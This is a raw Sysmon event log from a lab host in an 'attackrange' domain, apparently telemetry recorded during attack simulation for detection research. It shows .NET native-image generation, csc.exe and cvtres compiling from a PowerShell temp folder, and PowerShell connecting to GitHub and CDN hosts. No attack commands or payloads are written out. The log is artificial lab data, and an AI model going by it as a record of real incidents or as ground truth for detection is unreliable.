154100x800000000000000023664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.080{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES4723.tmp" "c:\Users\Administrator\AppData\Local\Temp\k4y1undg\CSCCD4895C0D4A94362BF65B1CDDBE456E3.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdline" 10341000x800000000000000023663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:17.061{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A285-60D3-D705-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.045{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D705-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:17.045{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A285-60D3-D705-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.045{4DB9351A-A285-60D3-D605-00000000CF01}7068NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AMATZLF9SM\System.IO.Compression.ni.dll.auxMD5=C2A7DDD48D8E56613E74337BCA64A3E8,SHA256=C042ED5270BAF499877FE42359AA94805580249DF22DAC8CEDCAB93904B7E45F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.045{4DB9351A-A285-60D3-D605-00000000CF01}7068NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AMATZLF9SM\System.IO.Compression.ni.dllMD5=7A384D0944291F6F238DEE095A980C83,SHA256=A5E470743FF15E7738CD0E254E45EE379085ABB5CD0E44C24044A2BD1A48933C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A285-60D3-D605-00000000CF01}7068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.998{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D605-00000000CF01}7068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.998{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A285-60D3-D605-00000000CF01}7068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.998{4DB9351A-A284-60D3-D505-00000000CF01}7056NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NKG3FY72MM\System.IdentityModel.Services.ni.dll.auxMD5=352804A1AA668BACA6C350485DE2480C,SHA256=795C416DAB03D96158E4EB003D8C437BBEE36C056243A8F402360F960975F762,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.998{4DB9351A-A284-60D3-D505-00000000CF01}7056NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NKG3FY72MM\System.IdentityModel.Services.ni.dllMD5=E3675B67243FE8ED3B4E6F8AA4048047,SHA256=689570A5684CE9DAF573097EB4FF8A66E1F598200422031391DF61A2A3E78E01,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.905{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D7D6A5B59AC52A6F350E8DB2BE45EBC,SHA256=DE58B745FFC95E777A126D59F198BA495E73F23E8645E98716AA12777A3FBFA1,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000023707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.762{4DB9351A-A273-60D3-3C05-00000000CF01}6608onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000023706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.717{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_10nsze4l.ukd.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:18.717{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_almu3xay.crr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.717{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_almu3xay.crr.ps12021-06-23 21:07:18.717 354300x800000000000000023703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.147{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local54235- 354300x800000000000000023702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.255{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61465-false192.30.255.120lb-192-30-255-120-sea.github.com443https 10341000x800000000000000023784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.373{4DB9351A-A287-60D3-DE05-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IDCI3QXHP9\System.Net.Http.WebRequest.ni.dll.auxMD5=483431129F9190051B1EC50590DCF257,SHA256=9D4BE4C246AC8E15B56A83439962302B4F3D138D0257301BAFC5422D6C2CF405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.373{4DB9351A-A287-60D3-DE05-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IDCI3QXHP9\System.Net.Http.WebRequest.ni.dllMD5=7C68A5AC8D535378F612870CA7CCEEDD,SHA256=ED21D278E8040EB0C6C8203D92F08A1D238425A5B2A725F08FD20664C7FDF40A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DE05-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.326{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DE05-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.326{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DE05-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.314{4DB9351A-A287-60D3-DD05-00000000CF01}3744NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AGQIJ56SHC\System.Net.ni.dll.auxMD5=001D3306D1DB7F0359F91B7ADC4E2E74,SHA256=875C1B5FDA814271F1BB175681834BBD73A0A76D55252601E80E97E433C2A628,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000023727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.665{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61466-false104.77.62.187a104-77-62-187.deploy.static.akamaitechnologies.com443https 354300x800000000000000023726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.636{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local56013- 354300x800000000000000023725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.162{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local56004- 23542300x800000000000000023724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.314{4DB9351A-A287-60D3-DD05-00000000CF01}3744NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AGQIJ56SHC\System.Net.ni.dllMD5=8A000F43C92AAB6AD4863B5F14FD43A3,SHA256=2745A4100057838F170AA794BAC37A3C80E6EC1917782472CBF8A2AC6454927E,IMPHASH=00000000000000000000000000000000truetrue 
10341000x800000000000000023723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DD05-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.108{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DD05-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:19.108{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DD05-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.108{4DB9351A-A287-60D3-DC05-00000000CF01}6372NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6GCYL2DYGC\System.Messaging.ni.dll.auxMD5=881348267BA22AFD6BE8FF784DDE4AD6,SHA256=4E8CBE58E75D814BB43C64ACB16482A879168F493DFB97B6F23912F2BC32AE09,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.092{4DB9351A-A287-60D3-DC05-00000000CF01}6372NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6GCYL2DYGC\System.Messaging.ni.dllMD5=A254DE1138854669ABB33C5B1E80615E,SHA256=95DABDC7C42D37603E1EDB07C127A0E7D28A27F764AAB667FC77269C834DD2F1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DC05-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.061{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DC05-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
